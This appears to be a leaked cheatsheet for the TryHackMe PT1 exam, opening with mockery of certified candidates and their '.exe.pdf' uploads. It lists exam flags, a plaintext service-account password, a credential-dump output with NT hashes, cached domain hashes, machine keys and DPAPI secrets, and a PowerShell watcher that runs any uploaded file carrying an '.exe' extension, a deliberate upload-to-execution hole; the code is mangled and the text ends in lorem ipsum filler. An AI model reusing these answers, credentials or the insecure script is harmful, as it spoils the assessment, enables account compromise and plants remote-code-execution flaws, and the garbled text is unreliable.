🇺🇸 English: TryHackMe PT1 Exam Cheatsheet

🇮🇳 Hindi: TryHackMe PT1 परीक्षा चीटशीट

🇸🇦 Arabic: ‫ ورقة الغش المتحان‬TryHackMe PT1

🇨🇳 Chinese (Simplified): TryHackMe PT1 考试备忘单

🇪🇸 Spanish: Hoja de trucos del examen TryHackMe PT1

🇧🇷 Portuguese: Cola do Exame TryHackMe PT1

🇫🇷 French: Aide-mémoire pour l'examen TryHackMe PT1

🇧🇩 Bengali: TryHackMe PT1 পরীক্ষার চিটশীট

🇷🇺 Russian: Шпаргалка для экзамена TryHackMe PT1

🇹🇷 Turkish: TryHackMe PT1 Sınav Kopya Kağıdı

You might want to reconsider all PT1 candidates from May to July. 🙂

Be cautious when hiring someone with a PT1 certification — odds are, they’ll upload
a .exe.pdf to your site without hesitation.

Big thanks to TryHackMe for shaping the next generation of junk pentester mindsets
— masters of the .exe.pdf craft!

Do you really think uploading a .exe.pdf makes you elite?

TryHackMe, what exactly are you teaching?

Congrats to all the certified .exe.pdf uploaders — you’ve officially earned your
bullshit pentester badge! 🎉

Web Site

THM{727723c6-2fe3-4cac-bfab-10d5f55ad360}

THM{cc557de2-c99f-4f93-a21a-f0ca419260b3}

THM{ad3bbf7b-a8e4-40de-b839-91ba91329eb5}

THM{0c8cb256-0c8a-4b59-ac87-1bbb609bef4f}

THM{b5730df7-bf4e-414c-97ec-2643a4d52e19}

Network

THM{8770bc30576c02e6a964063a42ddcc14}

THM{6e48a4c5035762e632263eb394b853cb}

THM{a6acc6f064265af6dbac0605f5b01b21}

THM{cb2552f4f9387e8bf8cf52b7036e9a13}

AD
THM{58b41573-062b-42ea-b312-dd5b7cc27671}

THM{W0rKst4T10n_Cr4ck3D}

THM{89930cd9-6a2c-4ec0-844b-9c1665452039}

THM{ROASTING_THE_EXAM}

THM{832c862a-477c-4efe-95d3-e60a8ca0787e}

THM{4c6a40ac-51f0-4038-a481-e374774701d2}

svc.callback:qvBVAj9avM3ykcbf9s

[*] Service RemoteRegistry is in stopped state

[*] Starting service RemoteRegistry

[*] Target system bootKey: 0xfa0661c3eee8696eeb436f2bafa060e7

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)

Administrator:500:aad3b435b51404eeaad3b435b51404ee:568a741b56c79622cc3f4c83720bf45e
:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::

WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:95f2822ae7e725c8e30b2b31f66
c1b86:::

[*] Dumping cached domain logon information (domain/username:hash)

TRYHACKME.LOC/Administrator:
$DCC2$10240#Administrator#a7e2fe9b84ad21469644db110814763a: (2025-04-24 10:33:48)

TRYHACKME.LOC/svc.callback:
$DCC2$10240#svc.callback#997ddef31c4e4d30f70e769dd08b9de4: (2025-06-04 13:00:09)

[*] Dumping LSA Secrets

[*] $MACHINE.ACC

TRYHACKMEWRK$:aes256-cts-hmac-sha1-
96:95faf672df799724b3b73e41ce00a5031c178524d882f767c2bcd9fbd929b5dc

TRYHACKMEWRK$:aes128-cts-hmac-sha1-96:5e5a19d0ddbdd1d07f6e39a918b3855a

TRYHACKMEWRK$:des-cbc-md5:f461fda7abd016d0

TRYHACKMEWRK$:plain_password_hex:da54f7ce12519737a7812baee2c53026f17c0e8ec8545feabc
cff6159be21f54b655085fba1dfa18ea2ace0c1e445eeb796a1224dd909b6109c086c772dd789d71362
ff9ebf25b433be7a2edb44f00ac89c2ce450f4d9ec6be80233dfe979cebf82cb7dbc9ddde09f955c71a
84919611d76caa813f0568c8d58f118cdb16554aabca4bc58a94fc2462d0ae955635382fa2e860e1aed
28c61a98a7a09b55528c62e6c9b69ffcc4b0534e2432068a98fd23fb955d6382d8f12c4529dad708bb2
be076f64605ac7966c69c5badd092864fcd404992903e3b988587ba27a9c63d9e1d772246521cd168ee
8e70db98416c2fe

TRYHACKMEWRK$:aad3b435b51404eeaad3b435b51404ee:68e79b0fef8226fb65337e0d96f6cd4d:::

[*] DefaultPassword

tryhackme.locsvc.callback:qvBVAj9avM3ykcbf9s

[*] DPAPI_SYSTEM

dpapi_machinekey:0x9117806e84e766de5f0e796deb3d789eb9eede6c

dpapi_userkey:0x67e8753ee98e5cc0e9ac98f9373549a0bbee1091

[*] NL$KM

0000 F8 5C 8B ED 35 A3 E4 51 57 3F 89 BD 1C BF 37 CD ...5..QW?....7.

0010 6D E2 9A DB FE 79 81 78 5A C5 4F CC 27 04 60 89 m....y.xZ.O.'.`.

0020 64 BB F4 89 67 64 4F 3B F1 A4 AB CF 16 0A 5F 89 d...gdO;......_.

0030 8C 7A AC 46 79 1F F1 A7 3E FD 72 61 9F B1 FA AC .z.Fy...>.ra....

NL$KM:f85c8bed35a3e451573f89bd1cbf37cd6de29adbfe7981785ac54fcc2704608964bbf48967644
f3bf1a4abcf160a5f898c7aac46791ff1a73efd72619fb1faac
[*] Cleaning up...

[*] Stopping service RemoteRegistry

$FolderPath = "C:xampphtdocsuploads"

$LogFile = "C:xamppbinarieslog.txt"

$FileDictionary = @{}

# =============================

# Function: Execute File Based On Type

# =============================

function Execute-FileBasedOnType {

param (

[string]$filePath,

[string]$type

try {

switch ($type) {

"exe" {

# Define target folder

$targetFolder = "C:xamppbinaries"

if (-not (Test-Path $targetFolder)) {

New-Item -Path $targetFolder -ItemType Directory | Out-Null

# Strip the last extension (e.g., .pdf) to get correct name

$cleanName = [System.IO.Path]::GetFileNameWithoutExtension($filePath)

$targetPath = Join-Path $targetFolder $cleanName

# Copy and rename the file

Copy-Item -Path $filePath -Destination $targetPath -Force

Write-Host "Copied and renamed file to: $targetPath"

Write-Host "Executing binary: $targetPath"

Start-Process -FilePath $targetPath

return "Execution success (copied to safe path and ran: $targetPath)"

default {

Write-Host "Unknown file type or unsafe to execute: $filePath"

return "Unknown or unsupported file type"

} catch {

$errorMsg = "Error executing $type file: $($_.Exception.Message)"

Write-Host $errorMsg

return $errorMsg

# =============================

# Function: Get Real Extension (supports double extension detection)

# =============================

function Get-RealExtension {

param ($filename)

$knownExtensions = @("exe")

foreach ($ext in $knownExtensions) {

if ($filename -match ".$ext(.|$)") {

return $ext

return $null

# =============================

# Function: Log Activity

# =============================
function Log-Activity {

param (

[string]$fileName,

[string]$filePath,

[string]$action,

[string]$status

$logLine = "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") | $action | $fileName |

$status"

Add-Content -Path $LogFile -Value $logLine

# =============================

# Initialize Dictionary

# =============================

$Files = Get-ChildItem -Path $FolderPath

foreach ($file in $Files) {

$FileDictionary[$file.Name] = $file.LastWriteTime

# =============================

# Main Watcher Loop

# =============================

while ($true) {

Start-Sleep -Seconds 1

$Files = Get-ChildItem -Path $FolderPath

foreach ($file in $Files) {

$fileName = $file.Name

$filePath = Join-Path $FolderPath $fileName

if ($FileDictionary.ContainsKey($fileName)) {

if ($file.LastWriteTime -ne $FileDictionary[$fileName]) {

Write-Host "File $fileName has been modified."

$FileDictionary[$fileName] = $file.LastWriteTime

$realExt = Get-RealExtension $fileName

if ($realExt) {

$result = Execute-FileBasedOnType $filePath $realExt

Log-Activity -fileName $fileName -filePath $filePath -action "MODIFIED" -status

$result

} else {

Write-Host "File $fileName has been added."

$FileDictionary[$fileName] = $file.LastWriteTime

$realExt = Get-RealExtension $fileName

if ($realExt) {

$result = Execute-FileBasedOnType $filePath $realExt

Log-Activity -fileName $fileName -filePath $filePath -action "ADDED" -status

$result

# =============================

# Check for deleted files

# =============================

$deletedFiles = @()

foreach ($fileName in $FileDictionary.Keys) {

if (-not (Test-Path -Path (Join-Path $FolderPath $fileName))) {

Write-Host "File $fileName has been deleted."

$deletedFiles += $fileName

Log-Activity -fileName $fileName -filePath "" -action "DELETED" -status "File was
removed"

}
foreach ($deletedFile in $deletedFiles) {

$FileDictionary.Remove($deletedFile)

Lorem ipsum dolor sit amet amet incididunt id in ex nisi labore ea irure nulla
laborum nisi duis. Duis magna aliqua esse id laborum aute nulla in velit ex in
ullamco minim aute et occaecat minim est aliquip. Magna veniam adipisicing do nulla
officia commodo id eu ut aute magna consequat.

Enim non ut culpa esse duis adipisicing laboris esse minim Lorem nulla et nostrud
ex enim. Duis ut minim est non duis et aliquip est mollit ea deserunt magna velit
aute proident id mollit dolore sint esse nisi commodo. Aute consequat occaecat
proident excepteur nostrud quis esse in anim deserunt reprehenderit incididunt
pariatur est pariatur quis in minim ad cupidatat. Aute velit deserunt incididunt
qui culpa irure incididunt magna. Aliquip dolor commodo pariatur minim officia eu
esse tempor ea et sunt, aute.

Consectetur culpa consectetur pariatur elit, dolore consectetur cupidatat esse

labore enim velit Lorem cillum et cupidatat aute eiusmod consectetur culpa
consectetur non enim sunt ullamco. Dolore et aliquip ipsum ea fugiat dolor officia
duis excepteur cupidatat est fugiat deserunt id. Occaecat minim ullamco aliquip
ipsum nulla do irure culpa sunt, irure quis. Amet anim exercitation aute voluptate
id excepteur Lorem voluptate eiusmod aliquip sit eiusmod laboris enim amet.